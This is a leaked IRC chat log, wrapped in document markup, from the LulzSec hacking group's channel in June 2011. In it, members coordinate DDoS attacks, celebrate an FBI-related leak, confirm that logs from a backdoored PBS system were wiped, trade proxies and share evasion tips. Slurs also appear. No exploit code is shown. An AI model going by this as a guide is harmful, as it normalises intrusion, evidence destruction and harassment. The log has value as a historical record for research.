        <w:t>Jun 03 17:01:19 sabu yeah hes gay Jun 03 17:01:20 sabu ..win 2 Jun 03 17:01:35 joepie91 Quote #1171: "joepie91 they could make the Regulatory Agency of E-Porn (RAEP) and I would care less" (added by Spoonzy at 01:37 AM, April 02, 2011) Jun 03 17:01:40 joepie91 effexor \o/ Jun 03 17:04:08 storm its back up now Jun 03 17:04:10 storm and rofl sabu Jun 03 17:04:21 storm this videos funny Jun 03 17:08:05 joepie91 storm Jun 03 17:08:09 joepie91 where is collective hosted?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 17:08:28 storm Host Virtual, Inc VR-208-111-35-0-24 (NET-208-111-35- 0-1) 208.111.35.0 - 208.111.35.255 Jun 03 17:08:43 storm VR HOSTED VRHOS-ARIN-19-0002 (NET-208-111-32-0-1) 208.111.32.0 - 208.111.47.255 Jun 03 17:10:25 * Topiary has changed the topic to: pE | Research and exploit development | Coding, designing, penetrating, packeting, laughing at our crippled opponents Jun 03 17:10:34 joepie91 @MrEGrizzly Jun 03 17:10:34 joepie91 Mr. E Grizzly Jun 03 17:10:34 joepie91 @LulzSec 504 error on WWW.lulzsecurity.com Jun 03 17:10:34 joepie91 3 minutes ago via Twitter for Android Jun 03 17:10:45 * lol has quit (A TLS packet with unexpected length was received.) Jun 03 17:10:48 Topiary nope it's up joepie Jun 03 17:10:54 storm its not up for me Jun 03 17:10:58 storm hasnt been Jun 03 17:11:05 Topiary I guess it's still down in a few areas Jun 03 17:11:32 joepie91 give me a sec Jun 03 17:11:34 joepie91 I think...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 17:11:37 joepie91 we are getting too much traffic Jun 03 17:11:37 joepie91 lol Jun 03 17:11:56 pwnsauce FFS Jun 03 17:12:07 * lol (parr0t@HA-i98.11n.cc0br2.IP) has joined #pure-elite Jun 03 17:12:20 joepie91 ohwait Jun 03 17:12:21 joepie91 that was 503 Jun 03 17:12:27 joepie91 504 is just a cloudflare bork Jun 03 17:12:38 joepie91 ED had the issue with too much traffic Jun 03 17:12:42 joepie91 ED was too big for cloudflare o_O Jun 03 17:12:58 joepie91 as in, there were errors because there were so many requests a second, the servers couldn't handle it Jun 03 17:13:03 Topiary apparently we're handling 50-100 legit requests a second Jun 03 17:16:45 joepie91 ye, it's not capacity faill Jun 03 17:16:48 joepie91 fail* Jun 03 17:16:49 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 17:16:52 joepie91 there seem to be issues with cloudflare Jun 03 17:16:58 joepie91 someone else gets connection refused Jun 03 17:17:05 joepie91 so I suppose cloudflare has to fix their shit Jun 03 17:17:20 joepie91 with anonnews, ED, and lulzsec... they've probably been handling a bit more traffic lately :D Jun 03 17:18:25 pwnsauce true dat Jun 03 17:19:43 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 03 17:31:03 storm hmm Jun 03 17:31:10 storm looks like others are taking after us Jun 03 17:31:14 storm and ddosing collective Jun 03 17:31:16 storm cause im not Jun 03 17:31:25 storm [17:31] [+sillygooth(+i)] [2:collective/#2600(+lmnt)] [Lag: 32 (??)] Jun 03 17:31:57 storm their ddos is slow though Jun 03 17:39:19 sabu yeah Jun 03 17:39:25 sabu thats some laerm Jun 03 17:39:26 sabu lamer Jun 03 17:39:31 storm lol Jun 03 17:39:33 storm isnt me!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 17:40:08 joepie91 anyone feels like playing age of empires 2 Jun 03 17:40:12 joepie91 in multiplayer Jun 03 17:40:15 joepie91 with me and a friend?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 17:40:19 storm aoe sucks Jun 03 17:40:19 storm well Jun 03 17:40:22 storm i suck at aoe Jun 03 17:40:26 joepie91 lol Jun 03 17:40:44 storm i play another multiplayer game from the 90's Jun 03 17:40:54 joepie91 no but srsly Jun 03 17:41:00 joepie91 we are trying to get a 2v2 going Jun 03 17:41:03 joepie91 but missing player ;_; Jun 03 17:41:03 storm 2d overhead capture the flag/strategic game Jun 03 17:41:04 storm xD Jun 03 17:41:11 Topiary storm: you ever play on the Dreamcast?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 17:41:19 storm yeah when i was a kid Jun 03 17:41:25 Topiary I still have one Jun 03 17:41:29 storm haha Jun 03 17:43:01 * trollpoll has quit (Quit: Leaving) Jun 03 17:44:36 sabu yo stormsex Jun 03 17:44:43 sabu dont waste no more resources on 2600 Jun 03 17:44:45 sabu save your boxes Jun 03 17:44:50 sabu we'll have another target Jun 03 17:45:53 storm ok Jun 03 17:45:57 storm will do broski Jun 03 17:45:59 storm :) Jun 03 17:46:09 storm rebooting to go play that game in the aforementioned Jun 03 17:46:14 storm afk guiz Jun 03 17:46:15 sabu kk Jun 03 17:46:18 sabu thx bro Jun 03 17:46:18 pwnsauce kk Jun 03 17:46:21 storm &lt;3 sabu Jun 03 17:46:25 storm laters Jun 03 17:46:29 * storm detached Jun 03 18:31:53 * lol has quit (A TLS packet with unexpected length was received.) Jun 03 18:31:55 * lol (parr0t@HA-bdi.9ck.dqsjqe.IP) has joined #pure-elite Jun 03 18:37:35 * pwnsauce has quit (Ping timeout: 121 seconds) Jun 03 18:44:27 * lol has quit (A TLS packet with unexpected length was received.) Jun 03 18:44:35 * lol (lol@HA-s5h.ho4.fu85s5.IP) has joined #pure-elite Jun 03 18:58:59 * Palladium (Palladium@HA-kd2.1lr.tbgr2g.IP) has joined #pure-elite Jun 03 18:59:47 &lt;palladium&gt; Hi Jun 03 19:02:04 lol hi :D Jun 03 19:17:46 * Palladium has quit (Quit: Lost terminal) Jun 03 19:24:01 sabu hi Jun 03 19:25:48 [redacted] hi Jun 03 19:26:47 * Palladium (Palladium@HA-kd2.1lr.tbgr2g.IP) has joined #pure-elite Jun 03 19:26:54 &lt;palladium&gt; Hi Jun 03 19:28:34 sabu hi Jun 03 19:28:38 sabu what up niggles Jun 03 19:29:50 [redacted] can i haz op Jun 03 19:30:28 [redacted] joepie91- I love AoE 2 :D Jun 03 19:30:31 * Sabu gives channel operator status to [redacted] Jun 03 19:30:33 * Sabu gives channel operator status to Palladium Jun 03 19:30:45 * Sabu gives channel operator status to tflow Jun 03 19:30:46 * Sabu gives channel operator status to lol Jun 03 19:40:20 * joepie91 has quit (Ping timeout: 121 seconds) Jun 03 19:47:34 * Palladium has quit (Quit: Lost terminal) Jun 03 19:54:52 * joepie91 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pure- elite Jun 03 19:57:18 joepie91 well fuck Jun 03 19:57:22 joepie91 AoE crashed my entire pc Jun 03 19:57:23 joepie91 :| Jun 03 19:57:31 joepie91 did I miss anything?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 19:59:11 tflow no Jun 03 19:59:13 tflow you're in time Jun 03 19:59:17 tflow for fuckfbi Jun 03 19:59:22 tflow going to release in a few mins Jun 03 19:59:32 tflow but we can't upload it to tpb because tpb upload is borked Jun 03 19:59:43 tflow so we just have to do a plain .torrent file Jun 03 19:59:50 tflow :&lt; Jun 03 20:00:11 joepie91 oh Jun 03 20:00:17 joepie91 let me log on frm lapy Jun 03 20:00:19 joepie91 lappy* Jun 03 20:00:24 joepie91 on what domain can I reach this server/ Jun 03 20:00:26 joepie91 derp Jun 03 20:00:28 joepie91 ?* Jun 03 20:00:41 joepie91 hanging over keyboard typing sideways =/= success Jun 03 20:01:31 tflow this irc?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:01:35 tflow there's no domain afaik Jun 03 20:03:44 joepie91 well Jun 03 20:03:45 joepie91 derp Jun 03 20:03:54 joepie91 let me manually type the ip then :P Jun 03 20:05:06 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 20:05:27 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 03 20:06:05 * joepie92 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pure- elite Jun 03 20:06:11 * joepie92 is now known as joepie91_laptop Jun 03 20:06:12 joepie91_laptop ohaithar Jun 03 20:06:26 joepie91_laptop lulz from bed :D Jun 03 20:06:55 tflow same Jun 03 20:17:01 joepie91_laptop http://postimage.org/image/2nzrr8f44 Jun 03 20:17:28 tflow that's pretty old Jun 03 20:20:23 joepie91_laptop b14ck4dd3r == SanguineRose?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:20:31 joepie91_laptop writing style somewhat matches Jun 03 20:20:40 joepie91_laptop and yes I know it's old, just hadn';t seen the picture before :P Jun 03 20:22:00 joepie91_laptop also Jun 03 20:22:15 joepie91_laptop apparently lulzsec has inspired people to use both cloudflare and bitcoin Jun 03 20:22:35 joepie91_laptop Topiary: for added win, get Cloudflare to accept Bitcoins for their Pro package Jun 03 20:28:56 joepie91_laptop @attritionorg Jun 03 20:28:56 joepie91_laptop attrition.org Jun 03 20:28:56 joepie91_laptop @securitygen does @CloudFlare still fail to protect a site if you attack it using IP instead of DNS name?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:29:00 * joepie91_laptop facepalms Jun 03 20:29:23 * Neuron (Neuron@HA-t6n.62t.o0m95d.IP) has joined #pure- elite Jun 03 20:29:28 neuron o/ hey gusy Jun 03 20:30:03 sabu hi sexypie Jun 03 20:30:41 neuron hey baby want a good time?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:30:44 * Neuron shakes ass Jun 03 20:31:11 joepie91_laptop Neuron Jun 03 20:31:12 joepie91_laptop hai Jun 03 20:31:14 sabu doing new lelak now Jun 03 20:31:19 neuron whats the leak?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:31:27 neuron i logged on :P im not sure what FuckFBIFriday is Jun 03 20:31:32 joepie91_laptop Neuron, can you pm the non-cinfu socks to joepie91 (my desktop) again?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:31:35 joepie91_laptop I might need it :P Jun 03 20:31:47 neuron joepie91_laptop: i no longer have a non cinfu socks i canceled it :P Jun 03 20:31:51 joepie91_laptop oh Jun 03 20:31:53 joepie91_laptop :| Jun 03 20:31:56 neuron all mine are cinfu :( Jun 03 20:32:01 neuron ill work on getting more Jun 03 20:32:05 joepie91_laptop where did you register them from Jun 03 20:32:06 joepie91_laptop the cinfus Jun 03 20:32:06 neuron Sabu: we in 2600?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:32:12 joepie91_laptop because I got caught by maxmind today &gt;.&gt; Jun 03 20:32:15 sabu http://infragardatlanta.org/ Jun 03 20:32:18 sabu no. neuron.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:32:21 sabu stay away from there Jun 03 20:32:40 neuron Sabu: was just asking. If we were i was just gonna work on socialing Jun 03 20:33:06 tflow check twitter feed Jun 03 20:33:08 neuron joepie91_laptop: you have to register from the same place your ip is Jun 03 20:33:10 tflow we just released Jun 03 20:33:11 tflow :&gt; Jun 03 20:33:29 joepie91_laptop I know Jun 03 20:33:30 joepie91_laptop I did Jun 03 20:33:35 joepie91_laptop got busted for open proxy &gt;.&gt; Jun 03 20:33:39 neuron lmfao Jun 03 20:33:46 neuron send me 1bc and ill order one for you Jun 03 20:33:49 joepie91_laptop so I need something non-public Jun 03 20:33:50 joepie91_laptop ah Jun 03 20:33:52 joepie91_laptop thats ok too Jun 03 20:33:59 joepie91_laptop lemme get out of bed Jun 03 20:34:10 neuron rgr Jun 03 20:34:12 neuron whos tflow ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:34:38 tflow i've been here since the start of lulzsec, just not in this chan Jun 03 20:35:44 neuron ahh i see.. hi o/ im neuron the local keyboard cowboy *i code* Jun 03 20:36:36 joepie91 Neuron, check your pm for a sec so I can get back into bed Jun 03 20:36:38 joepie91 it's cold Jun 03 20:36:39 joepie91 :P Jun 03 20:36:43 tflow ah Jun 03 20:36:43 tflow nice Jun 03 20:36:48 neuron joepie91: check it :P Jun 03 20:37:55 * joepie91_laptop back into bed Jun 03 20:38:47 neuron Sabu: what servers did you end up buying?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:39:27 sabu hold on neuron Jun 03 20:39:28 sabu hop on twitter Jun 03 20:39:31 sabu watch it expose Jun 03 20:39:33 sabu explode Jun 03 20:39:50 neuron watching Jun 03 20:40:20 joepie91_laptop twitter is raping my laptop :( Jun 03 20:40:56 neuron its not so much raping me :/ Jun 03 20:41:07 neuron im searching fbi hacked Jun 03 20:41:22 joepie91_laptop guys Jun 03 20:41:23 joepie91_laptop please Jun 03 20:41:27 joepie91_laptop stop using spaces in filenames Jun 03 20:41:40 neuron joepie.... file\ space Jun 03 20:41:41 joepie91_laptop it breaks browsers, webservers, caching services, and a shitload of other shit Jun 03 20:41:49 neuron :P or %20 Jun 03 20:41:54 joepie91_laptop I know Jun 03 20:41:57 joepie91_laptop but they still tend to break shit Jun 03 20:42:04 joepie91_laptop I've often had unexplainable errors on webservers Jun 03 20:42:13 joepie91_laptop that were fixed by removing spaces Jun 03 20:43:11 joepie91_laptop 3.75 load average...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:43:12 joepie91_laptop :| Jun 03 20:45:47 &lt;hsien&gt; yoz Jun 03 20:45:51 neuron o/ Jun 03 20:48:19 &lt;hsien&gt; hows it Jun 03 20:49:45 joepie91_laptop 28.3 load average on a pentium 3 FUCK YEAH Jun 03 20:51:13 neuron brb need new ip Jun 03 20:51:14 * Neuron has quit (Quit: leaving) Jun 03 20:51:43 tflow what's anonops saying about this joepie91?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:52:29 * Neuron (Neuron@HA-875.col.tt2aeb.IP) has joined #pure- elite Jun 03 20:54:41 joepie91_laptop idk Jun 03 20:54:47 joepie91_laptop notlogged on from lappy Jun 03 20:55:01 joepie91_laptop lemme walk to my pc Jun 03 21:00:48 neuron joepie91_laptop: what os?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 21:01:07 joepie91 laptop = puppy linux Jun 03 21:01:24 joepie91 tflow: people seem to think lulzsec is win Jun 03 21:01:26 neuron no :P like what os for your box..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>ubuntu,devian,centos,suse,fedora Jun 03 21:01:28 joepie91 haven;t read much yet Jun 03 21:01:31 joepie91 I'm tired Jun 03 21:01:32 joepie91 oh Jun 03 21:01:33 joepie91 derp Jun 03 21:01:41 * joepie91 saw laptop and OS in one sentence Jun 03 21:01:43 joepie91 debian of course Jun 03 21:01:45 joepie91 :D Jun 03 21:04:01 tflow http://pastebin.com/kixK4rfu Jun 03 21:04:13 tflow blackhat seo, trying to capitilize on lulzsec lol Jun 03 21:04:21 tflow but how the fk did it get 18k views Jun 03 21:06:47 joepie91_laptop tflow Jun 03 21:06:50 joepie91_laptop proxy view increaser Jun 03 21:06:53 joepie91_laptop or similar tools Jun 03 21:07:02 joepie91_laptop http://www.sven-slootweg.nl/downloads Jun 03 21:07:05 joepie91_laptop I have a really crappy one Jun 03 21:07:09 joepie91_laptop that I made for someone a long time ago Jun 03 21:08:07 neuron joepie91_laptop: check pm Jun 03 21:08:36 joepie91_laptop I know :P Jun 03 21:08:37 joepie91_laptop sec Jun 03 21:12:54 joepie91_laptop Sabu, tflow, Topiary Jun 03 21:12:55 joepie91_laptop &lt;cedr&gt;[18:06:30] &lt;cedr&gt; Fuck FBI Friday (FFF).rar is not RAR archive - ah well.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 21:12:56 joepie91_laptop &lt;cedr&gt;[18:06:52] &lt;cedr&gt; ohh Jun 03 21:12:56 joepie91_laptop &lt;cedr&gt;[18:06:55] &lt;cedr&gt; its a fucking .zip Jun 03 21:12:56 joepie91_laptop &lt;cedr&gt;[18:06:57] &lt;cedr&gt; fail Jun 03 21:12:56 joepie91_laptop &lt;cedr&gt;did they purposely name their zip archive .rar? :p Jun 03 21:13:27 tflow wat Jun 03 21:13:32 joepie91_laptop idk Jun 03 21:13:40 &lt;hsien&gt; dude weird Jun 03 21:13:41 tflow we've never uploaded any rar/zip archive Jun 03 21:13:48 &lt;hsien&gt; i owned a box named cedr Jun 03 21:13:48 joepie91_laptop it's the torrent Jun 03 21:13:55 joepie91_laptop also, if someone has a pastebin account or feels like making one... report that spam submission :D Jun 03 21:14:02 * Topiary trollface.bat Jun 03 21:14:09 joepie91_laptop lol Jun 03 21:14:11 joepie91_laptop Topiary Jun 03 21:14:13 Topiary I made a zip and called it rar because it trolls the shit out of faggots Jun 03 21:14:14 joepie91_laptop as I just said Jun 03 21:14:24 joepie91_laptop if you want epic over 9000 end boss bonus level points Jun 03 21:14:29 joepie91_laptop make cloudflare accept bitcoins Jun 03 21:14:31 joepie91_laptop for their Pro package Jun 03 21:14:50 joepie91_laptop :D Jun 03 21:40:32 * t[2] (t@HA-tbl.rkn.75e5ku.IP) has joined #pure-elite Jun 03 21:43:27 * Topiary has quit (Ping timeout: 121 seconds) Jun 03 21:44:31 * t[2] has quit (Quit: ==&gt;) Jun 03 21:45:03 * Topiary (t@HA-tbl.rkn.75e5ku.IP) has joined #pure-elite Jun 03 21:58:56 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 21:59:16 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 03 22:02:53 joepie91_laptop wel Jun 03 22:02:59 joepie91_laptop I think it's time for me Jun 03 22:03:03 joepie91_laptop to meet with Mr. Dream Jun 03 22:03:06 joepie91_laptop goodnight all Jun 03 22:03:06 Recursion holy shit Jun 03 22:03:09 joepie91_laptop ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 22:03:09 sabu hi Jun 03 22:03:10 Recursion wtf happened today?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 22:03:13 sabu a lot ;) Jun 03 22:03:13 joepie91_laptop lolol Jun 03 22:03:15 sabu check twitter Jun 03 22:03:16 sabu ROFL Jun 03 22:03:27 joepie91_laptop lulzsec declared war to the US?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 22:03:28 joepie91_laptop :P Jun 03 22:03:28 Recursion I caught the jist of it Jun 03 22:04:09 joepie91_laptop but really Jun 03 22:04:11 joepie91_laptop night guys Jun 03 22:04:18 Recursion g'night Jun 03 22:05:31 storm yo Jun 03 22:07:08 storm went swimming Jun 03 22:07:12 storm had some beers Jun 03 22:07:19 storm toked on my e cigarette Jun 03 22:07:22 storm good night man Jun 03 22:07:25 storm good night Jun 03 22:07:25 storm :D Jun 03 22:29:42 * Recursion has quit (Quit: leaving) Jun 03 22:29:54 sabu hi Jun 03 22:29:56 sabu well guys Jun 03 22:30:07 sabu those of you that are still with us through this Jun 03 22:30:22 sabu maintain alert, make sure you're behind vpns dont matter what Jun 03 22:30:32 sabu and dont fear Jun 03 22:30:33 sabu we're ok Jun 03 22:30:34 sabu w/i n2 Jun 03 22:43:27 neuron back Jun 03 22:43:37 sabu sup neuron Jun 03 22:44:15 neuron Sabu: did we lose people?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:28:15 storm agreed Jun 03 23:28:16 storm did we?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:31:10 sabu yeah Jun 03 23:31:18 storm who?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:31:23 sabu recursion and devurandom quit respectfully Jun 03 23:31:27 sabu saying they are not up for the heat Jun 03 23:31:32 sabu you realize we smacked the fbi today Jun 03 23:31:36 sabu this means everyone in here Jun 03 23:31:42 sabu must remain extremely secure Jun 03 23:31:49 storm Sabu Jun 03 23:31:55 storm did you wipe the pbs bd logs?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:31:58 sabu yes Jun 03 23:31:59 storm k Jun 03 23:32:01 sabu all pbs logs are clean Jun 03 23:32:04 storm then i'm game for some more Jun 03 23:32:06 sabu ;) Jun 03 23:32:08 sabu we're good Jun 03 23:32:14 sabu we got a good team here Jun 03 23:33:53 storm hehe Jun 03 23:33:53 storm orly Jun 03 23:34:06 sabu ;] Jun 03 23:34:12 storm so Jun 03 23:34:16 storm what did we do to the fbi Jun 03 23:34:24 sabu you dont know?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:34:25 sabu ROFL Jun 03 23:34:28 storm nope Jun 03 23:34:30 sabu twitter.com/lulzsec Jun 03 23:34:33 storm i was gone all day Jun 03 23:34:34 sabu ravaged them tonight Jun 03 23:34:37 storm lmao Jun 03 23:39:02 neuron O/ Jun 03 23:39:14 neuron tflow: Yo Jun 03 23:40:06 storm After doing so, we contacted Karim and told him what we did. After a few discussions, he offered to Jun 03 23:40:06 storm pay us to eliminate his competitors through illegal hacking means in return for our silence. Karim, Jun 03 23:40:06 storm a member of an FBI-related website, was willing to give us money and inside info in order to destroy Jun 03 23:40:07 storm his opponents in the whitehat world. We even discussed plans for him to give us insider botnet information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:40:09 storm ROFLMFAO Jun 03 23:40:10 storm ROFLMFAO Jun 03 23:40:11 storm wow Jun 03 23:40:16 storm epic reading Jun 03 23:40:32 neuron Yo anyone have any extra tips for staying safe? Jun 03 23:43:08 sabu clean your box out, make sure any sensitive info you have encrypted on a usb stick Jun 03 23:43:12 sabu stay behind your vpn Jun 03 23:43:16 sabu from now on your vpn is your weapon Jun 03 23:43:23 sabu without your weapon you are nothing Jun 03 23:43:30 sabu without you it is notihng blah blah blah Jun 03 23:43:34 neuron haha Jun 03 23:43:39 sabu and dont do nothing we dont approve of :D Jun 03 23:44:04 neuron Alright right now.. My "hackbox" has 512 aes encryption on the entire harddrive Jun 03 23:44:18 neuron two passwords and truecrypt on info concerning anything hacking related Jun 03 23:44:24 neuron and my vpn is HideMyAss Jun 03 23:44:43 storm sabu Jun 03 23:44:55 storm my netbook will be here win only a matter of days Jun 03 23:45:01 storm and ill be wiping my entire system Jun 03 23:45:05 storm desktop Jun 03 23:45:14 storm and just encrypting the entire drive Jun 03 23:45:16 neuron im already wiping my enitre desktop Jun 03 23:45:16 storm after i scrub it Jun 03 23:45:58 sabu yeah Jun 03 23:46:01 sabu wipe it all Jun 03 23:46:04 sabu im wiping all my shit now Jun 03 23:46:04 sabu BUT Jun 03 23:47:09 neuron ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:47:57 sabu storm: http://www.youtube.com/watch?v=SUlkAPxrwcw Jun 03 23:48:04 sabu LOLOL thats my fav vid ever Jun 03 23:48:46 neuron What do they call shells that have no logging Jun 03 23:48:48 neuron i know theres a term Jun 03 23:50:22 neuron "chaosbox" Jun 03 23:54:06 storm @LulzSec Ceasefire and we'll get you some sweatshirts. Plus a decent lawyer and movie agent if it comes to that. Your channels are restored.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
